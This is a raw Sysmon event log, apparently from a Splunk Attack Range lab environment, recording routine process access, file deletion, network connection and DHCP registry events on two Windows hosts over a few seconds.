11:02:21.110{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294405Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:21.110{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-143D-6216-9306-000000003802}6688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294404Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:21.110{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-143D-6216-9306-000000003802}6688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000294403Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:21.108{C8EA50B7-143D-6216-9306-000000003802}6688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000218669Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:22.986{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=026C23338BFCA819FED0C586E511634E,SHA256=07400FCE883E2A911339590BC959FC08B7A25B6E56FA7C28817A77D362D5D859,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294413Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:20.688{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53890-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000294412Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:22.442{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7E8DC05AB5C4AB9B7AE9F5F3B8EC3C8,SHA256=94B41381FA96D3AF16FF3ADC9D413C1CE0B41548258D08D94D0FC17CBF70D21C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218668Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:19.549{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse47.242.107.32-59614-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000294414Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:23.457{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=288055875D5BEB3DB7879D34104BC71D,SHA256=AEBC05075947460D6EC7FDCA158559D35C360567A19FFBB9B9E5E072C62DC400,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294418Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:24.975{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\aborted-session-pingMD5=4DF181C4F7DF12A4AB71FECCF478C482,SHA256=43CA6E4ECC19652ED510E8A21D98228298EA0B42EB108E780CFE075D6DB61E63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294417Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:24.491{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=BF4F19E6D65A1E73AB1CD4164CFDCD63,SHA256=F1C779A908D73B1113488443DBBCB29FA0CEE6F23FB5555F47038DAC02FF2613,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294416Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:24.491{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=5E1170D8BDED52ACAA37650968F313DF,SHA256=45B022AF8B626437015B766C644E89AD39D0CEAB41B14298B60EAB7FE1D100B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294415Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:24.459{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD920CDD2538E24B855434DBAF905728,SHA256=0FA7ACF2152F592CD980D005DA22BB14E3D17539841F7189C8BC23449651027A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218672Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:24.549{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E403E00A623D10B9ADE5887598D4F739,SHA256=7A74BFEE50D25B1CECB39E2B41410597E5167BBC12416B1C57182AE87F0686CA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218671Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:21.742{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx61447-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000218670Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:24.017{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5CD2FC7308F73A9397887824E0550EB,SHA256=0C9D660DE43B1A6D0156BB71E82FABD80857EA5C2578E479B899FCD4B368A4AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294419Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:25.460{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58088A58ED8CB151E328EB4269397127,SHA256=99F1806D1A20ACA7F0CEF82CAD0CFBE3BCBBEE1EEF1EE3072D61752DAF19F846,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218673Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:25.252{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=370BA261FA0856ECD240AD45D27EF7D0,SHA256=722FE112719A1A9BE2F002EA77D32F7B410EC0BB03BBCE56E3E3ADDA24CB544E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294420Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:26.490{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FF32E65270445EC52E76BC696697AEC,SHA256=6C218E3AF82E7F7ACCA41DA60026915AE521869FAE40817AD9F88508F5F36091,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218675Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:23.576{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51477-false10.0.1.12-8000- 23542300x8000000000000000218674Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:26.283{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0324CE0F4773A064315A93316D8CAEA4,SHA256=9BF7AE7ACBD9C36D84CC08AC9AC65D75924FA9A216DBF6F9B99567EE33C2752E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294422Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:27.712{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=2D9B84AADE0BA5E0E7BCDC6AD6BB7EAD,SHA256=5CEDE6D771E689C687E995CED774582C873007EE533F465D24FFF2EF23F30D9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294421Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:27.492{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCB8318DD854294193C7247E7A87F35F,SHA256=0ADEADEB5C65047946E2CB32B96A21CB6FD38EC9434CF6E346A35399AAACC044,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218677Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:27.502{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16E0F421C3396643531FBBAC69EFEC65,SHA256=DADF3E43AD5D6A04D2230886EB433E58BB5FC05F5522E9B896CF56AD28ADEE2C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218676Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:25.111{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx58290-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000294424Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:28.513{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20A7FBBA6E942438030DE3F4FCDF16AC,SHA256=A2572C27A7894F7AB6235AA254FF86022554E068F798B9189E22B5B0BD2E7CC1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218696Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:28.939{4F8D34B0-F11B-6215-0B00-000000003902}6324020C:\Windows\system32\lsass.exe{4F8D34B0-F11C-6215-1600-000000003902}1192C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218695Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:28.939{4F8D34B0-F11B-6215-0B00-000000003902}6324020C:\Windows\system32\lsass.exe{4F8D34B0-F11C-6215-1600-000000003902}1192C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218694Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:28.939{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11B-6215-0B00-000000003902}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218693Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:28.939{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11B-6215-0B00-000000003902}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218692Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:28.939{4F8D34B0-F11B-6215-0B00-000000003902}6324020C:\Windows\system32\lsass.exe{4F8D34B0-F11B-6215-0A00-000000003902}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+1b8ad|C:\Windows\system32\lsasrv.dll+2878b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000218691Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-SetValue2022-02-23 11:02:28.939{4F8D34B0-F11C-6215-1100-000000003902}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4c272fe2-3d52-42c6-b049-7c4abef4d053}\DhcpConnForceBroadcastFlagDWORD (0x00000000) 13241300x8000000000000000218690Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-SetValue2022-02-23 11:02:28.939{4F8D34B0-F11C-6215-1100-000000003902}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4c272fe2-3d52-42c6-b049-7c4abef4d053}\IsServerNapAwareDWORD (0x00000000) 13241300x8000000000000000218689Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-SetValue2022-02-23 11:02:28.939{4F8D34B0-F11C-6215-1100-000000003902}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4c272fe2-3d52-42c6-b049-7c4abef4d053}\AddressTypeDWORD (0x00000000) 13241300x8000000000000000218688Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-SetValue2022-02-23 11:02:28.939{4F8D34B0-F11C-6215-1100-000000003902}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4c272fe2-3d52-42c6-b049-7c4abef4d053}\LeaseTerminatesTimeDWORD (0x62162254) 13241300x8000000000000000218687Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-SetValue2022-02-23 11:02:28.939{4F8D34B0-F11C-6215-1100-000000003902}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4c272fe2-3d52-42c6-b049-7c4abef4d053}\T2DWORD (0x62162092) 13241300x8000000000000000218686Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-SetValue2022-02-23 11:02:28.939{4F8D34B0-F11C-6215-1100-000000003902}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4c272fe2-3d52-42c6-b049-7c4abef4d053}\T1DWORD (0x62161b4c) 13241300x8000000000000000218685Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-SetValue2022-02-23 11:02:28.939{4F8D34B0-F11C-6215-1100-000000003902}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4c272fe2-3d52-42c6-b049-7c4abef4d053}\LeaseObtainedTimeDWORD (0x62161444) 13241300x8000000000000000218684Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-SetValue2022-02-23 11:02:28.939{4F8D34B0-F11C-6215-1100-000000003902}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4c272fe2-3d52-42c6-b049-7c4abef4d053}\LeaseDWORD (0x00000e10) 13241300x8000000000000000218683Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-SetValue2022-02-23 11:02:28.939{4F8D34B0-F11C-6215-1100-000000003902}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4c272fe2-3d52-42c6-b049-7c4abef4d053}\DhcpServer10.0.1.1 13241300x8000000000000000218682Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-SetValue2022-02-23 11:02:28.939{4F8D34B0-F11C-6215-1100-000000003902}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4c272fe2-3d52-42c6-b049-7c4abef4d053}\DhcpSubnetMask255.255.255.0 13241300x8000000000000000218681Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-SetValue2022-02-23 11:02:28.939{4F8D34B0-F11C-6215-1100-000000003902}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4c272fe2-3d52-42c6-b049-7c4abef4d053}\DhcpIPAddress10.0.1.15 13241300x8000000000000000218680Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-SetValue2022-02-23 11:02:28.939{4F8D34B0-F11C-6215-1100-000000003902}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4c272fe2-3d52-42c6-b049-7c4abef4d053}\DhcpInterfaceOptionsBinary Data 23542300x8000000000000000218679Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:28.517{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D355A47F7A352DFE9C6AEFCEEB45D7CA,SHA256=5039238E16FA24672E7CBA76329A1DCCCC059B88C9CB50AA109F713D47F0F145,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294423Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:25.717{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53892-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000218678Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:28.002{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0BAC37A9BEEE2113E3B647E63A180ECB,SHA256=A649ABE65E0C09E7129CEB5109623D9A1503140D8CF3B84F62F3AA07972EF686,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294425Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:29.545{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F178A70386FF81B056B7016574326952,SHA256=916C509350B7F83368CDCBC0A2447F9444BF65F3E225C723213E716245BCAE6B,IMPHASH=00000000000000000000000000000000falsetrue 